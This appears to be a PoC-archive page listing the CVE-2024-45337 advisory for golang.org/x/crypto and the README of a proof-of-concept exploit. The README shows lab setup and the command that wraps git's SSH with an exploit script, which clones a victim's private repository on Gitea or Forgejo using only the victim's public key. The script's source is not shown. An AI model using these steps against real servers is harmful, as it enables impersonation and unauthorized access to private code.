Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-45337 PoC — Misuse of connection.serverAuthenticate may cause authorization bypass in golang.org/x/crypto

Source
https://github.com/peace-maker/CVE-2024-45337
Associated Vulnerability
Title:Misuse of connection.serverAuthenticate may cause authorization bypass in golang.org/x/crypto (CVE-2024-45337)
Description:Applications and libraries which misuse connection.serverAuthenticate (via callback field ServerConfig.PublicKeyCallback) may be susceptible to an authorization bypass. The documentation for ServerConfig.PublicKeyCallback says that "A call to this function does not guarantee that the key offered is in fact used to authenticate." Specifically, the SSH protocol allows clients to inquire about whether a public key is acceptable before proving control of the corresponding private key. PublicKeyCallback may be called with multiple keys, and the order in which the keys were provided cannot be used to infer which key the client successfully authenticated with, if any. Some applications, which store the key(s) passed to PublicKeyCallback (or derived information) and make security relevant determinations based on it once the connection is established, may make incorrect assumptions. For example, an attacker may send public keys A and B, and then authenticate with A. PublicKeyCallback would be called only twice, first with A and then with B. A vulnerable application may then make authorization decisions based on key B for which the attacker does not actually control the private key. Since this API is widely misused, as a partial mitigation golang.org/x/cry...@v0.31.0 enforces the property that, when successfully authenticating via public key, the last key passed to ServerConfig.PublicKeyCallback will be the key used to authenticate the connection. PublicKeyCallback will now be called multiple times with the same key, if necessary. Note that the client may still not control the last key passed to PublicKeyCallback if the connection is then authenticated with a different method, such as PasswordCallback, KeyboardInteractiveCallback, or NoClientAuth. Users should be using the Extensions field of the Permissions return value from the various authentication callbacks to record data associated with the authentication attempt instead of referencing external state. Once the connection is established the state corresponding to the successful authentication attempt can be retrieved via the ServerConn.Permissions field. Note that some third-party libraries misuse the Permissions type by sharing it across authentication attempts; users of third-party libraries should refer to the relevant projects for guidance.
Description
Proof of Concept for CVE-2024-45337 against Gitea and Forgejo
Readme
Proof of Concept exploit for CVE-2024-45337
===

This repository contains a proof of concept exploit for [CVE-2024-45337](https://nvd.nist.gov/vuln/detail/CVE-2024-45337).
It can be used to wrap `ssh` when interacting with an SSH server which is implemented using `golang.org/x/crypto` <= v0.30.0. while caching permissions in the `ServerConfig.PublicKeyCallback` callback in an unsafe manner.

Gitea <= 1.22.4 and Forgejo <= 7.0.11, 9.0.2 are vulnerable when hosted using the internal SSH server. You can impersonate any user as long as you know any of the public keys they have associated with their account. You need to have an account yourself which you use for ssh authentication.

## Run the PoC

1. Start a vulnerable forgejo or gitea instance. Gitea Docker images aren't vulnerable, so you'll have to run using a native binary.
```shell
docker compose -f docker-compose.forgejo.yml up -d
```
2. Install while changing the SSH port to 22 on http://localhost:3000
3. Register a `victim` user
    1.  Add the victim's public key to the account on http://localhost:3000/user/settings/keys
    2.  Create a private repository called `important_repo` and generate an initial commit with a README so you have something to clone
4. Register an `attacker` user
   1. Add the attacker's public key to the account on http://localhost:3000/user/settings/keys
5. Clone the repository using the attacker's account
   1. Set `GIT_ATTACK_PRIVKEY` to path to private key of valid account
   2. Set `GIT_ATTACK_PUBKEY` to path to known public key of other target account. We don't know the private key for that one.
   3. Set `GIT_SSH` to path to exploit script to tell `git` to use this instead of the native `ssh` command
```shell
GIT_ATTACK_PRIVKEY=./id_ed25519_attacker GIT_ATTACK_PUBKEY=./id_ed25519_victim.pub GIT_SSH_VARIANT=ssh GIT_SSH=./ssh_cve-2024-45337.py git clone ssh://git@localhost:222/victim/important_repo.git
```

## Demo

Use `.ssh/config` to specify keys during cloning
```
Host sshvictim
 Hostname localhost
 Port 222
 User git
 IdentityFile /path/to/id_ed25519_victim
 IdentitiesOnly yes
Host sshattacker
 Hostname localhost
 Port 222
 User git
 IdentityFile /path/to/id_ed25519_attacker
 IdentitiesOnly yes
```

Run against local Forgejo 7.0.11 container setup like above.
```
$ ssh-keygen -t ed25519 -f id_ed25519_victim
$ ssh-keygen -t ed25519 -f id_ed25519_attacker
$ git clone sshattacker:victim/important_repo.git
Cloning into 'important_repo'...
Forgejo: User: 2:attacker with Key: 2:attacker is not authorized to read victim/important_repo.
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
$ git clone sshvictim:victim/important_repo.git
Cloning into 'important_repo'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.

# Delete private key of victim for demo purposes
$ rm -rf important_repo id_ed25519_victim
$ GIT_ATTACK_PRIVKEY=./id_ed25519_attacker GIT_ATTACK_PUBKEY=./id_ed25519_victim.pub GIT_SSH_VARIANT=ssh GIT_SSH=./ssh_cve-2024-45337.py git clone ssh://git@localhost:222/victim/important_repo.git
Cloning into 'important_repo'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
```
File Snapshot

 [4.0K]  /data/pocs/cea1d6618a64a2448634c85ddf812e928de34e30
├── [ 463]  docker-compose.forgejo.yml
├── [3.4K]  README.md
├── [  16]  requirements.txt
└── [6.1K]  ssh_cve-2024-45337.py

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →